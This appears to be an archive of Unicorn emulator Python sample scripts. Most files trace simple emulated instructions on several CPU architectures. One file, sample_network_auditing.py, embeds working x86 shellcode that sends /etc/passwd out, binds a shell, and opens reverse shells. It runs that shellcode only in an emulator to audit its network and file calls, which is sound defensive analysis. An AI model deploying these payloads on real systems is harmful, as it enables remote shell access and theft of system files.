������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/python/sample_arm64.py�������������������������������������������������������0000775�0000000�0000000�00000006735�14675241067�0021204�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env python # Sample code for ARM64 of Unicorn. Nguyen Anh Quynh <aquynh@gmail.com> # Python sample ported by Loi Anh Tuan <loianhtuan@gmail.com> from __future__ import print_function from unicorn import * from unicorn.arm64_const import * # code to be emulated ARM64_CODE = b"\xab\x05\x00\xb8\xaf\x05\x40\x38" # str x11, [x13]; ldrb x15, [x13] # MSR code ARM64_MRS_CODE = b"\x62\xd0\x3b\xd5" # mrs x2, tpidrro_el0 # memory address where emulation starts ADDRESS = 0x10000 # callback for tracing basic blocks def hook_block(uc, address, size, user_data): print(">>> Tracing basic block at 0x%x, block size = 0x%x" %(address, size)) # callback for tracing instructions def hook_code(uc, address, size, user_data): print(">>> Tracing instruction at 0x%x, instruction size = 0x%x" %(address, size)) # Test ARM64 def test_arm64(): print("Emulate ARM64 code") try: # Initialize emulator in ARM mode mu = Uc(UC_ARCH_ARM64, UC_MODE_ARM) # map 2MB memory for this emulation mu.mem_map(ADDRESS, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(ADDRESS, ARM64_CODE) # initialize machine registers mu.reg_write(UC_ARM64_REG_X11, 0x12345678) mu.reg_write(UC_ARM64_REG_X13, 0x10008) mu.reg_write(UC_ARM64_REG_X15, 0x33) # tracing all basic blocks with customized callback mu.hook_add(UC_HOOK_BLOCK, hook_block) # tracing one instruction with customized callback mu.hook_add(UC_HOOK_CODE, hook_code, begin=ADDRESS, end=ADDRESS) # emulate machine code in infinite time mu.emu_start(ADDRESS, ADDRESS + len(ARM64_CODE)) # now print out some registers print(">>> Emulation done. Below is the CPU context") print(">>> As little endian, X15 should be 0x78:") x11 = mu.reg_read(UC_ARM64_REG_X11) x13 = mu.reg_read(UC_ARM64_REG_X13) x15 = mu.reg_read(UC_ARM64_REG_X15) print(">>> X15 = 0x%x" %x15) except UcError as e: print("ERROR: %s" % e) def test_arm64_read_sctlr(): print("Read SCTLR_EL1") try: # Initialize emulator in ARM mode mu = Uc(UC_ARCH_ARM64, UC_MODE_ARM) # Read SCTLR_EL1 # crn = 1; # crm = 0; # op0 = 3; # op1 = 0; # op2 = 0; val = mu.reg_read(UC_ARM64_REG_CP_REG, (1, 0, 3, 0, 0)) print(">>> SCTLR_EL1 = 0x%x" % val) except UcError as e: print("ERROR: %s" % e) def test_arm64_hook_mrs(): def _hook_mrs(uc, reg, cp_reg, _): print(f">>> Hook MRS instruction: reg = 0x{reg:x}(UC_ARM64_REG_X2) cp_reg = {cp_reg}") uc.reg_write(reg, 0x114514) print(">>> Write 0x114514 to X") # Skip MRS instruction return True print("Test hook MRS instruction") try: # Initialize emulator in ARM mode mu = Uc(UC_ARCH_ARM64, UC_MODE_ARM) # Map an area for code mu.mem_map(0x1000, 0x1000) # Write code mu.mem_write(0x1000, ARM64_MRS_CODE) # Hook MRS instruction mu.hook_add(UC_HOOK_INSN, _hook_mrs, None, 1, 0, UC_ARM64_INS_MRS) # Start emulation mu.emu_start(0x1000, 0x1000 + len(ARM64_MRS_CODE)) print(f">>> X2 = {mu.reg_read(UC_ARM64_REG_X2):x}") except UcError as e: print("ERROR: %s" % e) if __name__ == '__main__': test_arm64() print("=" * 26) test_arm64_read_sctlr() print("=" * 26) test_arm64_hook_mrs() �����������������������������������unicorn-2.1.1/bindings/python/sample_arm64eb.py�����������������������������������������������������0000775�0000000�0000000�00000004161�14675241067�0021502�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env python # Sample code for ARM64 of Unicorn. Nguyen Anh Quynh <aquynh@gmail.com> # Python sample ported by Loi Anh Tuan <loianhtuan@gmail.com> # AARCH64 Python sample ported by zhangwm <rustydaar@gmail.com> from __future__ import print_function from unicorn import * from unicorn.arm64_const import * # code to be emulated ARM64_CODE = b"\xab\x05\x00\xb8\xaf\x05\x40\x38" # str x11, [x13]; ldrb x15, [x13] # memory address where emulation starts ADDRESS = 0x10000 # callback for tracing basic blocks def hook_block(uc, address, size, user_data): print(">>> Tracing basic block at 0x%x, block size = 0x%x" %(address, size)) # callback for tracing instructions def hook_code(uc, address, size, user_data): print(">>> Tracing instruction at 0x%x, instruction size = 0x%x" %(address, size)) # Test ARM64 def test_arm64(): print("Emulate ARM64 Big-Endian code") try: # Initialize emulator in ARM mode mu = Uc(UC_ARCH_ARM64, UC_MODE_ARM | UC_MODE_BIG_ENDIAN) # map 2MB memory for this emulation mu.mem_map(ADDRESS, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(ADDRESS, ARM64_CODE) # initialize machine registers mu.reg_write(UC_ARM64_REG_X11, 0x12345678) mu.reg_write(UC_ARM64_REG_X13, 0x10008) mu.reg_write(UC_ARM64_REG_X15, 0x33) # tracing all basic blocks with customized callback mu.hook_add(UC_HOOK_BLOCK, hook_block) # tracing all instructions with customized callback mu.hook_add(UC_HOOK_CODE, hook_code, begin=ADDRESS, end=ADDRESS) # emulate machine code in infinite time mu.emu_start(ADDRESS, ADDRESS + len(ARM64_CODE)) # now print out some registers print(">>> Emulation done. Below is the CPU context") print(">>> As big endian, X15 should be 0x12:") x11 = mu.reg_read(UC_ARM64_REG_X11) x13 = mu.reg_read(UC_ARM64_REG_X13) x15 = mu.reg_read(UC_ARM64_REG_X15) print(">>> X15 = 0x%x" %x15) except UcError as e: print("ERROR: %s" % e) if __name__ == '__main__': test_arm64() ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/python/sample_armeb.py�������������������������������������������������������0000775�0000000�0000000�00000006143�14675241067�0021332�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env python # Sample code for ARM big endian of Unicorn. zhangwm <rustydaar@gmail.com> from __future__ import print_function from unicorn import * from unicorn.arm_const import * # code to be emulated ARM_CODE = b"\xe3\xa0\x00\x37\xe0\x42\x10\x03" # mov r0, #0x37; sub r1, r2, r3 THUMB_CODE = b"\xb0\x83" # sub sp, #0xc # memory address where emulation starts ADDRESS = 0x10000 # callback for tracing basic blocks def hook_block(uc, address, size, user_data): print(">>> Tracing basic block at 0x%x, block size = 0x%x" %(address, size)) # callback for tracing instructions def hook_code(uc, address, size, user_data): print(">>> Tracing instruction at 0x%x, instruction size = 0x%x" %(address, size)) # Test ARM def test_arm(): print("Emulate ARM Big-Endian code") try: # Initialize emulator in ARM mode mu = Uc(UC_ARCH_ARM, UC_MODE_ARM | UC_MODE_BIG_ENDIAN) # map 2MB memory for this emulation mu.mem_map(ADDRESS, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(ADDRESS, ARM_CODE) # initialize machine registers mu.reg_write(UC_ARM_REG_R0, 0x1234) mu.reg_write(UC_ARM_REG_R2, 0x6789) mu.reg_write(UC_ARM_REG_R3, 0x3333) mu.reg_write(UC_ARM_REG_APSR, 0xFFFFFFFF) #All application flags turned on # tracing all basic blocks with customized callback mu.hook_add(UC_HOOK_BLOCK, hook_block) # tracing one instruction at ADDRESS with customized callback mu.hook_add(UC_HOOK_CODE, hook_code, begin=ADDRESS, end=ADDRESS) # emulate machine code in infinite time mu.emu_start(ADDRESS, ADDRESS + len(ARM_CODE)) # now print out some registers print(">>> Emulation done. Below is the CPU context") r0 = mu.reg_read(UC_ARM_REG_R0) r1 = mu.reg_read(UC_ARM_REG_R1) print(">>> R0 = 0x%x" %r0) print(">>> R1 = 0x%x" %r1) except UcError as e: print("ERROR: %s" % e) def test_thumb(): print("Emulate THUMB code") try: # Initialize emulator in thumb mode mu = Uc(UC_ARCH_ARM, UC_MODE_THUMB | UC_MODE_BIG_ENDIAN) # map 2MB memory for this emulation mu.mem_map(ADDRESS, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(ADDRESS, THUMB_CODE) # initialize machine registers mu.reg_write(UC_ARM_REG_SP, 0x1234) # tracing all basic blocks with customized callback mu.hook_add(UC_HOOK_BLOCK, hook_block) # tracing all instructions with customized callback mu.hook_add(UC_HOOK_CODE, hook_code) # emulate machine code in infinite time # Note we start at ADDRESS | 1 to indicate THUMB mode. mu.emu_start(ADDRESS | 1, ADDRESS + len(THUMB_CODE)) # now print out some registers print(">>> Emulation done. Below is the CPU context") sp = mu.reg_read(UC_ARM_REG_SP) print(">>> SP = 0x%x" %sp) except UcError as e: print("ERROR: %s" % e) if __name__ == '__main__': test_arm() print("=" * 26) test_thumb() �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/python/sample_ctl.py���������������������������������������������������������0000775�0000000�0000000�00000006442�14675241067�0021030�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env python # Sample code for Unicorn. # By Lazymio(@wtdcode), 2021 from unicorn import * from unicorn.x86_const import * from datetime import datetime def test_uc_ctl_read(): uc = Uc(UC_ARCH_X86, UC_MODE_32) print("Reading some properties by uc_ctl.") arch = uc.ctl_get_arch() mode = uc.ctl_get_mode() page_size = uc.ctl_get_page_size() timeout = uc.ctl_get_timeout() print(f">>> arch={arch} mode={mode} page size={page_size} timeout={timeout}") def time_emulation(uc, start, end): n = datetime.now() uc.emu_start(start, end) return (datetime.now() - n).total_seconds() * 1e6 def test_uc_ctl_tb_cache(): # Initialize emulator in X86-32bit mode uc = Uc(UC_ARCH_X86, UC_MODE_32) addr = 0x10000 # Fill the code buffer with NOP. code = b"\x90" * 8 * 512 print("Controling the TB cache in a finer granularity by uc_ctl.") uc.mem_map(addr, 0x10000) # Write our code to the memory. uc.mem_write(addr, code) # Do emulation without any cache. standard = time_emulation(uc, addr, addr + len(code)) # Now we request cache for all TBs. for i in range(8): tb = uc.ctl_request_cache(addr + i * 512) print(f">>> TB is cached at {hex(tb.pc)} which has {tb.icount} instructions with {tb.size} bytes") # Do emulation with all TB cached. cached = time_emulation(uc, addr, addr + len(code)) # Now we clear cache for all TBs. for i in range(8): uc.ctl_remove_cache(addr + i * 512, addr + i * 512 + 1) evicted = time_emulation(uc, addr, addr + len(code)) print(f">>> Run time: First time {standard}, Cached: {cached}, Cached evicted: {evicted}") def trace_new_edge(uc, cur, prev, data): print(f">>> Getting a new edge from {hex(prev.pc + prev.size - 1)} to {hex(cur.pc)}") def trace_tcg_sub(uc, address, arg1, arg2, size, data): print(f">>> Get a tcg sub opcode at {hex(address)} with args: {arg1} and {arg2}") def test_uc_ctl_exits(): uc = Uc(UC_ARCH_X86, UC_MODE_32) addr = 0x1000 # cmp eax, 0; # jg lb; # inc eax; # nop; # lb: # inc ebx; # nop; code = b"\x83\xf8\x00\x7f\x02\x40\x90\x43\x90" exits = [addr + 6, addr + 8] print("Using multiple exits by uc_ctl") uc.mem_map(addr, 0x1000) # Write our code to the memory. uc.mem_write(addr, code) # We trace if any new edge is generated. uc.hook_add(UC_HOOK_EDGE_GENERATED, trace_new_edge) # Trace cmp instruction. uc.hook_add(UC_HOOK_TCG_OPCODE, trace_tcg_sub, aux1=UC_TCG_OP_SUB, aux2=UC_TCG_OP_FLAG_CMP) uc.ctl_exits_enabled(True) uc.ctl_set_exits(exits) # This should stop at ADDRESS + 6 and increase eax, even thouhg we don't provide an exit. uc.emu_start(addr, 0) eax = uc.reg_read(UC_X86_REG_EAX) ebx = uc.reg_read(UC_X86_REG_EBX) print(f">>> eax = {hex(eax)} and ebx = {hex(ebx)} after the first emulation") # This should stop at ADDRESS + 8, even thouhg we don't provide an exit. uc.emu_start(addr, 0) eax = uc.reg_read(UC_X86_REG_EAX) ebx = uc.reg_read(UC_X86_REG_EBX) print(f">>> eax = {hex(eax)} and ebx = {hex(ebx)} after the first emulation") if __name__ == "__main__": test_uc_ctl_read() print("="*32) test_uc_ctl_tb_cache() print("="*32) test_uc_ctl_exits()������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/python/sample_m68k.py��������������������������������������������������������0000775�0000000�0000000�00000005605�14675241067�0021033�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env python # Sample code for ARM of Unicorn. Nguyen Anh Quynh <aquynh@gmail.com> # Python sample ported by Loi Anh Tuan <loianhtuan@gmail.com> from __future__ import print_function from unicorn import * from unicorn.m68k_const import * # code to be emulated M68K_CODE = b"\x76\xed" # movq #-19, %d3 # memory address where emulation starts ADDRESS = 0x10000 # callback for tracing basic blocks def hook_block(uc, address, size, user_data): print(">>> Tracing basic block at 0x%x, block size = 0x%x" %(address, size)) # callback for tracing instructions def hook_code(uc, address, size, user_data): print(">>> Tracing instruction at 0x%x, instruction size = 0x%x" %(address, size)) # Test ARM def test_m68k(): print("Emulate M68K code") try: # Initialize emulator in ARM mode mu = Uc(UC_ARCH_M68K, UC_MODE_BIG_ENDIAN) # map 2MB memory for this emulation mu.mem_map(ADDRESS, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(ADDRESS, M68K_CODE) # initialize machine registers mu.reg_write(UC_M68K_REG_D3, 0x1234) # tracing all basic blocks with customized callback mu.hook_add(UC_HOOK_BLOCK, hook_block) # tracing all instructions with customized callback mu.hook_add(UC_HOOK_CODE, hook_code) # emulate machine code in infinite time mu.emu_start(ADDRESS, ADDRESS + len(M68K_CODE)) # now print out some registers print(">>> Emulation done. Below is the CPU context") a0 = mu.reg_read(UC_M68K_REG_A0) a1 = mu.reg_read(UC_M68K_REG_A1) a2 = mu.reg_read(UC_M68K_REG_A2) a3 = mu.reg_read(UC_M68K_REG_A3) a4 = mu.reg_read(UC_M68K_REG_A4) a5 = mu.reg_read(UC_M68K_REG_A5) a6 = mu.reg_read(UC_M68K_REG_A6) a7 = mu.reg_read(UC_M68K_REG_A7) d0 = mu.reg_read(UC_M68K_REG_D0) d1 = mu.reg_read(UC_M68K_REG_D1) d2 = mu.reg_read(UC_M68K_REG_D2) d3 = mu.reg_read(UC_M68K_REG_D3) d4 = mu.reg_read(UC_M68K_REG_D4) d5 = mu.reg_read(UC_M68K_REG_D5) d6 = mu.reg_read(UC_M68K_REG_D6) d7 = mu.reg_read(UC_M68K_REG_D7) pc = mu.reg_read(UC_M68K_REG_PC) sr = mu.reg_read(UC_M68K_REG_SR) print(">>> A0 = 0x%x\t\t>>> D0 = 0x%x" % (a0, d0)) print(">>> A1 = 0x%x\t\t>>> D1 = 0x%x" % (a1, d1)) print(">>> A2 = 0x%x\t\t>>> D2 = 0x%x" % (a2, d2)) print(">>> A3 = 0x%x\t\t>>> D3 = 0x%x" % (a3, d3)) print(">>> A4 = 0x%x\t\t>>> D4 = 0x%x" % (a4, d4)) print(">>> A5 = 0x%x\t\t>>> D5 = 0x%x" % (a5, d5)) print(">>> A6 = 0x%x\t\t>>> D6 = 0x%x" % (a6, d6)) print(">>> A7 = 0x%x\t\t>>> D7 = 0x%x" % (a7, d7)) print(">>> PC = 0x%x" % pc) print(">>> SR = 0x%x" % sr) except UcError as e: print("ERROR: %s" % e) if __name__ == '__main__': test_m68k() ���������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/python/sample_mips.py��������������������������������������������������������0000775�0000000�0000000�00000005615�14675241067�0021217�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env python # Sample code for MIPS of Unicorn. Nguyen Anh Quynh <aquynh@gmail.com> # Python sample ported by Loi Anh Tuan <loianhtuan@gmail.com> from __future__ import print_function from unicorn import * from unicorn.mips_const import * # code to be emulated MIPS_CODE_EB = b"\x34\x21\x34\x56" # ori $at, $at, 0x3456; MIPS_CODE_EL = b"\x56\x34\x21\x34" # ori $at, $at, 0x3456; # memory address where emulation starts ADDRESS = 0x10000 # callback for tracing basic blocks def hook_block(uc, address, size, user_data): print(">>> Tracing basic block at 0x%x, block size = 0x%x" %(address, size)) # callback for tracing instructions def hook_code(uc, address, size, user_data): print(">>> Tracing instruction at 0x%x, instruction size = 0x%x" %(address, size)) # Test MIPS EB def test_mips_eb(): print("Emulate MIPS code (big-endian)") try: # Initialize emulator in MIPS32 + EB mode mu = Uc(UC_ARCH_MIPS, UC_MODE_MIPS32 + UC_MODE_BIG_ENDIAN) # map 2MB memory for this emulation mu.mem_map(ADDRESS, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(ADDRESS, MIPS_CODE_EB) # initialize machine registers mu.reg_write(UC_MIPS_REG_1, 0x6789) # tracing all basic blocks with customized callback mu.hook_add(UC_HOOK_BLOCK, hook_block) # tracing all instructions with customized callback mu.hook_add(UC_HOOK_CODE, hook_code) # emulate machine code in infinite time mu.emu_start(ADDRESS, ADDRESS + len(MIPS_CODE_EB)) # now print out some registers print(">>> Emulation done. Below is the CPU context") r1 = mu.reg_read(UC_MIPS_REG_1) print(">>> R1 = 0x%x" %r1) except UcError as e: print("ERROR: %s" % e) # Test MIPS EL def test_mips_el(): print("Emulate MIPS code (little-endian)") try: # Initialize emulator in MIPS32 + EL mode mu = Uc(UC_ARCH_MIPS, UC_MODE_MIPS32 + UC_MODE_LITTLE_ENDIAN) # map 2MB memory for this emulation mu.mem_map(ADDRESS, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(ADDRESS, MIPS_CODE_EL) # initialize machine registers mu.reg_write(UC_MIPS_REG_1, 0x6789) # tracing all basic blocks with customized callback mu.hook_add(UC_HOOK_BLOCK, hook_block) # tracing all instructions with customized callback mu.hook_add(UC_HOOK_CODE, hook_code) # emulate machine code in infinite time mu.emu_start(ADDRESS, ADDRESS + len(MIPS_CODE_EL)) # now print out some registers print(">>> Emulation done. Below is the CPU context") r1 = mu.reg_read(UC_MIPS_REG_1) print(">>> R1 = 0x%x" %r1) except UcError as e: print("ERROR: %s" % e) if __name__ == '__main__': test_mips_eb() print("=" * 27) test_mips_el() �������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/python/sample_network_auditing.py��������������������������������������������0000775�0000000�0000000�00000030123�14675241067�0023614�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env python # Unicorn sample for auditing network connection and file handling in shellcode. # Nguyen Tan Cong <shenlongbk@gmail.com> from __future__ import print_function from unicorn import * from unicorn.x86_const import * import struct import uuid SIZE_REG = 4 SOCKETCALL_MAX_ARGS = 3 SOCKET_TYPES = { 1: "SOCK_STREAM", 2: "SOCK_DGRAM", 3: "SOCK_RAW", 4: "SOCK_RDM", 5: "SOCK_SEQPACKET", 10: "SOCK_PACKET" } ADDR_FAMILY = { 0: "AF_UNSPEC", 1: "AF_UNIX", 2: "AF_INET", 3: "AF_AX25", 4: "AF_IPX", 5: "AF_APPLETALK", 6: "AF_NETROM", 7: "AF_BRIDGE", 8: "AF_AAL5", 9: "AF_X25", 10: "AF_INET6", 12: "AF_MAX" } # http://shell-storm.org/shellcode/files/shellcode-861.php X86_SEND_ETCPASSWD = b"\x6a\x66\x58\x31\xdb\x43\x31\xd2\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\x6a\x66\x58\x43\x68\x7f\x01\x01\x01\x66\x68\x30\x39\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\x43\xcd\x80\x89\xc6\x6a\x01\x59\xb0\x3f\xcd\x80\xeb\x27\x6a\x05\x58\x5b\x31\xc9\xcd\x80\x89\xc3\xb0\x03\x89\xe7\x89\xf9\x31\xd2\xb6\xff\xb2\xff\xcd\x80\x89\xc2\x6a\x04\x58\xb3\x01\xcd\x80\x6a\x01\x58\x43\xcd\x80\xe8\xd4\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64" # http://shell-storm.org/shellcode/files/shellcode-882.php X86_BIND_TCP = b"\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80" # http://shell-storm.org/shellcode/files/shellcode-883.php X86_REVERSE_TCP = b"\x6a\x66\x58\x6a\x01\x5b\x31\xd2\x52\x53\x6a\x02\x89\xe1\xcd\x80\x92\xb0\x66\x68\x7f\x01\x01\x01\x66\x68\x05\x39\x43\x66\x53\x89\xe1\x6a\x10\x51\x52\x89\xe1\x43\xcd\x80\x6a\x02\x59\x87\xda\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x41\x89\xca\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80" # http://shell-storm.org/shellcode/files/shellcode-849.php X86_REVERSE_TCP_2 = b"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x66\xb3\x01\x51\x6a\x06\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\x31\xdb\xb3\x02\x68\xc0\xa8\x01\x0a\x66\x68\x7a\x69\x66\x53\xfe\xc3\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\x31\xc9\xb1\x03\xfe\xc9\xb0\x3f\xcd\x80\x75\xf8\x31\xc0\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xb0\x0b\xcd\x80" # memory address where emulation starts ADDRESS = 0x1000000 # supported classes class IdGenerator: def __init__(self): self.__next_id = 3 # exclude sdtin, stdout, stderr def next(self): next_id = self.__next_id self.__next_id += 1 return next_id class LogChain: def __init__(self): self.__chains = {} self.__linking_fds = {} def clean(self): self.__chains = {} self.__linking_fds = {} def create_chain(self, my_id): if not my_id in self.__chains: self.__chains[my_id] = [] else: print("LogChain: id %d existed" % my_id) def add_log(self, id, msg): fd = self.get_original_fd(id) if fd is not None: self.__chains[fd].append(msg) else: print("LogChain: id %d doesn't exist" % id) def link_fd(self, from_fd, to_fd): if not to_fd in self.__linking_fds: self.__linking_fds[to_fd] = [] self.__linking_fds[to_fd].append(from_fd) def get_original_fd(self, fd): if fd in self.__chains: return fd for orig_fd, links in self.__linking_fds.items(): if fd in links: return orig_fd return None def print_report(self): print(""" ---------------- | START REPORT | ---------------- """) for my_id, logs in self.__chains.items(): print("---- START FD(%d) ----" % my_id) print("\n".join(logs)) print("---- END FD(%d) ----" % my_id) print(""" -------------- | END REPORT | -------------- """) # end supported classes # utilities def bin_to_ipv4(ip): return "%d.%d.%d.%d" % ( (ip & 0xff000000) >> 24, (ip & 0xff0000) >> 16, (ip & 0xff00) >> 8, (ip & 0xff)) def read_string(uc, addr): ret = "" c = uc.mem_read(addr, 1)[0] read_bytes = 1 while c != 0x0: ret += chr(c) c = uc.mem_read(addr + read_bytes, 1)[0] read_bytes += 1 return ret def parse_sock_address(sock_addr): sin_family, = struct.unpack("<h", sock_addr[:2]) if sin_family == 2: # AF_INET port, host = struct.unpack(">HI", sock_addr[2:8]) return "%s:%d" % (bin_to_ipv4(host), port) elif sin_family == 6: # AF_INET6 return "" def print_sockcall(msg): print(">>> SOCKCALL %s" % msg) # end utilities # callback for tracing instructions def hook_code(uc, address, size, user_data): print(">>> Tracing instruction at 0x%x, instruction size = 0x%x" % (address, size)) # read this instruction code from memory tmp = uc.mem_read(address, size) print(">>> Instruction code at [0x%x] =" % (address), end="") for i in tmp: print(" %x" % i, end="") print("") # callback for tracing Linux interrupt def hook_intr(uc, intno, user_data): global id_gen # only handle Linux syscall if intno != 0x80: return eax = uc.reg_read(UC_X86_REG_EAX) ebx = uc.reg_read(UC_X86_REG_EBX) ecx = uc.reg_read(UC_X86_REG_ECX) edx = uc.reg_read(UC_X86_REG_EDX) eip = uc.reg_read(UC_X86_REG_EIP) # print(">>> INTERRUPT %d" % eax) if eax == 1: # sys_exit print(">>> SYS_EXIT") uc.emu_stop() elif eax == 3: # sys_read fd = ebx buf = ecx count = edx dummy_content = str(uuid.uuid1()).encode("latin1")[:32] if len(dummy_content) > count: dummy_content = dummy_content[:count] uc.mem_write(buf, dummy_content) msg = "read %d bytes from fd(%d) with dummy_content(%s)" % (count, fd, dummy_content) fd_chains.add_log(fd, msg) print(">>> %s" % msg) elif eax == 4: # sys_write fd = ebx buf = ecx count = edx content = uc.mem_read(buf, count) msg = "write data=%s count=%d to fd(%d)" % (content, count, fd) print(">>> %s" % msg) fd_chains.add_log(fd, msg) elif eax == 5: # sys_open filename_addr = ebx flags = ecx mode = edx filename = read_string(uc, filename_addr) dummy_fd = id_gen.next() uc.reg_write(UC_X86_REG_EAX, dummy_fd) msg = "open file (filename=%s flags=%d mode=%d) with fd(%d)" % (filename, flags, mode, dummy_fd) fd_chains.create_chain(dummy_fd) fd_chains.add_log(dummy_fd, msg) print(">>> %s" % msg) elif eax == 11: # sys_execv # print(">>> ebx=0x%x, ecx=0x%x, edx=0x%x" % (ebx, ecx, edx)) filename = read_string(uc, ebx) print(">>> SYS_EXECV filename=%s" % filename) elif eax == 63: # sys_dup2 fd_chains.link_fd(ecx, ebx) print(">>> SYS_DUP2 oldfd=%d newfd=%d" % (ebx, ecx)) elif eax == 102: # sys_socketcall # ref: http://www.skyfree.org/linux/kernel_network/socket.html call = uc.reg_read(UC_X86_REG_EBX) args = uc.reg_read(UC_X86_REG_ECX) SOCKETCALL_NUM_ARGS = { 1: 3, # sys_socket 2: 3, # sys_bind 3: 3, # sys_connect 4: 2, # sys_listen 5: 3, # sys_accept 9: 4, # sys_send 11: 4, # sys_receive 13: 2 # sys_shutdown } buf = uc.mem_read(args, SOCKETCALL_NUM_ARGS[call] * SIZE_REG) args = struct.unpack("<" + "I" * SOCKETCALL_NUM_ARGS[call], buf) # int sys_socketcall(int call, unsigned long *args) if call == 1: # sys_socket # err = sys_socket(a0,a1,a[2]) # int sys_socket(int family, int type, int protocol) family = args[0] sock_type = args[1] protocol = args[2] dummy_fd = id_gen.next() uc.reg_write(UC_X86_REG_EAX, dummy_fd) if family == 2: # AF_INET msg = "create socket (%s, %s) with fd(%d)" % (ADDR_FAMILY[family], SOCKET_TYPES[sock_type], dummy_fd) fd_chains.create_chain(dummy_fd) fd_chains.add_log(dummy_fd, msg) print_sockcall(msg) elif family == 3: # AF_INET6 pass elif call == 2: # sys_bind fd = args[0] umyaddr = args[1] addrlen = args[2] sock_addr = uc.mem_read(umyaddr, addrlen) msg = "fd(%d) bind to %s" % (fd, parse_sock_address(sock_addr)) fd_chains.add_log(fd, msg) print_sockcall(msg) elif call == 3: # sys_connect # err = sys_connect(a0, (struct sockaddr *)a1, a[2]) # int sys_connect(int fd, struct sockaddr *uservaddr, int addrlen) fd = args[0] uservaddr = args[1] addrlen = args[2] sock_addr = uc.mem_read(uservaddr, addrlen) msg = "fd(%d) connect to %s" % (fd, parse_sock_address(sock_addr)) fd_chains.add_log(fd, msg) print_sockcall(msg) elif call == 4: # sys_listen fd = args[0] backlog = args[1] msg = "fd(%d) listened with backlog=%d" % (fd, backlog) fd_chains.add_log(fd, msg) print_sockcall(msg) elif call == 5: # sys_accept fd = args[0] upeer_sockaddr = args[1] upeer_addrlen = args[2] # print(">>> upeer_sockaddr=0x%x, upeer_addrlen=%d" % (upeer_sockaddr, upeer_addrlen)) if upeer_sockaddr == 0x0: print_sockcall("fd(%d) accept client" % fd) else: upeer_len, = struct.unpack("<I", uc.mem_read(upeer_addrlen, 4)) sock_addr = uc.mem_read(upeer_sockaddr, upeer_len) msg = "fd(%d) accept client with upeer=%s" % (fd, parse_sock_address(sock_addr)) fd_chains.add_log(fd, msg) print_sockcall(msg) elif call == 9: # sys_send fd = args[0] buff = args[1] length = args[2] flags = args[3] buf = uc.mem_read(buff, length) msg = "fd(%d) send data=%s" % (fd, buf) fd_chains.add_log(fd, msg) print_sockcall(msg) elif call == 11: # sys_receive fd = args[0] ubuf = args[1] size = args[2] flags = args[3] msg = "fd(%d) is gonna receive data with size=%d flags=%d" % (fd, size, flags) fd_chains.add_log(fd, msg) print_sockcall(msg) elif call == 13: # sys_shutdown fd = args[0] how = args[1] msg = "fd(%d) is shutted down because of %d" % (fd, how) fd_chains.add_log(fd, msg) print_sockcall(msg) # Test X86 32 bit def test_i386(code): global fd_chains fd_chains.clean() print("Emulate i386 code") try: # Initialize emulator in X86-32bit mode mu = Uc(UC_ARCH_X86, UC_MODE_32) # map 2MB memory for this emulation mu.mem_map(ADDRESS, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(ADDRESS, code) # initialize stack mu.reg_write(UC_X86_REG_ESP, ADDRESS + 0x200000) # tracing all instructions with customized callback # mu.hook_add(UC_HOOK_CODE, hook_code) # handle interrupt ourself mu.hook_add(UC_HOOK_INTR, hook_intr) # emulate 